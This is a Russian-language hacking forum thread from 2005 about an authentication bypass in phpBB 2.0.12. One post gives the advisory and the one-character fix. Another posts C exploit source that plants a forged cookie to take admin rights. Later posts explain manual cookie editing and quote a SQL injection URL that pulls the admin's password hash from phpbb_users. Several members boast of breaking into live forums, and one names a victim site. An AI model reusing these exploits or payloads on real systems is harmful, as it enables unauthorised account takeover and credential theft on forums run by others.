Phpbb 2.0.12

Discussion in 'Мировые новости. Обсуждения.' started by madnet, 1 Mar 2005.

  1. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Уязвимость в PhpBB позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме.

    Уязвимость связана с ошибков в сравнении "sessiondata['autologinid']" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке:

    if( $sessiondata['autologinid'] == $auto_login_key )
    Условие выполняется, если длина $sessiondata['autologinid'], представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку:

    if( $sessiondata['autologinid'] === $auto_login_key )
    Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.

    http://www.securitylab.ru/52986.html
     
    _________________________
  2. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    блин опередил =\ Добавляю expl
    PHP:
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argcchar** argv[]) {
    FILE *pointer;
    char contenido[10000],

    cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
    %3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22"
    ,
    cookief[9]="%22%3B%7D"cookiec[106],

    cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
    %3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
    ,
    *
    pos;
    int p=0i=0;

    if (
    argc!=2) {
    printf("Usage: phpbb_exploit.exe user_id\n\n");
    exit(
    0);
    }
    pointer=fopen("cookies.txt""r");

    if (
    pointer) {
    fread(contenido30010pointer);
    fclose(pointer);
    } else {
    printf("The file can't be open\n");
    exit(
    0);
    }

    strcpy(cookieccookie);
    strncat(cookiecargv[1], 6);
    strcat(cookieccookief);

    if (
    pos=strstr(contenidocookiec)) {
    p=pos contenido;
    while (
    i<92) {
    if (
    cookie_false[i]!=NULL
    contenido[p]=cookie_false[i];
    p++;
    i++;
    }
    }
    else {
    printf("The file cookies.txt isn't valid for execute the
    exploit or the user id is incorrect\n"
    );
    exit(
    0);
    }

    if (
    pointer=fopen("cookies.txt""w")) {
    fputs(contenidopointer);
    printf("Cookie modified: \n\n%s\n\n"contenido);
    printf("The cookies file has overwriten... looks like the exploit has worked");
    } else 
    printf("\n\nThe file cookies.txt has not write permissions.");
    return 
    0;
    }
     
  3. OvERMiND

    OvERMiND New Member

    Joined:
    26 Jul 2004
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Скажи что изменять в куках ?, в ручную это сделать надежнее
     
  4. $h@dow

    $h@dow New Member

    Joined:
    1 Mar 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Вроде как эта фишка проходит только на некоторых серверах.
    Сейчас буду пробовать...
     
  5. OvERMiND

    OvERMiND New Member

    Joined:
    26 Jul 2004
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Спиздил код даже копирайтов не оставил засранец
     
  6. OvERMiND

    OvERMiND New Member

    Joined:
    26 Jul 2004
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Не от сервера зависит а от форума и браузера, эксплоит вообще под Мозиллу заточен.
    В файле cookies.txt в кеше мозиллы эксплоит заменяет строчки.

    Чтоб эксплоит сработал нужно залогиниться с выключенной опцией автологин, потом вырубить браузер, запустить сплоит причем файл cookies.txt должен лежать в одной папке с эксплоитом.

    Эксплоит делает равными по длине значения параметров
    autologin и autologiтkey поэтому собсвтенно всё и происходит

    Удачного результат пока ненашёл
     
    #6 OvERMiND, 1 Mar 2005
    Last edited: 1 Mar 2005
  7. $h@dow

    $h@dow New Member

    Joined:
    1 Mar 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    То что от версии форума зависит это понятно.
    Но также важную роль играет версия PHP, нормально ли она обрабатывает "==", поскольку некоторые сравняют лишь длинну строк, а остальные работают как strcmp().
     
  8. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    обоср***ся теперь мне :)) попал....
     
  9. KEZ

    KEZ Guest

    Reputations:
    0
    Я буду баги искать... Должны быть. Ещё нет ни одной версии без багов
     
  10. OvERMiND

    OvERMiND New Member

    Joined:
    26 Jul 2004
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Лол :D :D
     
  11. Fr1k

    Fr1k Elder - Старейшина

    Joined:
    11 Jun 2004
    Messages:
    252
    Likes Received:
    4
    Reputations:
    0
    нда чувак маладца
     
  12. hEr-Herzov4

    hEr-Herzov4 New Member

    Joined:
    2 Mar 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Вроде пока работает безотказно, уже побыл админом, и никаких проблем небыло. Как были с "/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*"
     
  13. KEZ

    KEZ Guest

    Reputations:
    0
    видео качайте
     
  14. BlackPrince

    BlackPrince Elder - Старейшина

    Joined:
    13 Oct 2004
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    видео, кстати нормальное. Всё понятно.
    Вот только не на всех форумах уязвимость срабатывает, щас над этим работаю, пытаюсь понять почему.
     
  15. KEZ

    KEZ Guest

    Reputations:
    0
    Потомучто надо иногда коечто исправить. А ещё ИНОГДА админы поставили так сказать ОБНОВЛЕНИЕ )) патч ))

    У кого были проблемы с SQL injection в phpBB 2.0.6: "/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=..."
    Там все просто и ясно...

    2BlackPrince:
    А у меня вообще видео плохое есть? ;)
     
  16. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    KEZ, спасибо за видак, закачал посе того как ты сразу его выложил,
    Я согласен, сплийт не всегда срабатывает, даже можно сказать поза вчера пыхтел над одним форумом, но никак,
    Хотя, некоторые форумы поддались легко.
    Да вот чё еще, пацаны, решил попробовать эту багу про сплойтировать на IE через любезный Cookie Editor,
    Все твердя что работает тока по Мозилой, да нет, IE тож поддалса:D.
    Один из жертв http://druid.ru, на него я залез пользуясь Куки Эдитор чрез IE.
    Так шо всё возможно, еси немного по пыхтеть:)

    PS: компиленный Си сплойт, для меня ваше не сработал, приходилось лазять в ручную.
     
  17. KEZ

    KEZ Guest

    Reputations:
    0
    У меня тоже C сплойт не работал..))
    Вообще проще вручную заменить... А где - в IE или Firefox - это пофигу... Главное куки то одинковые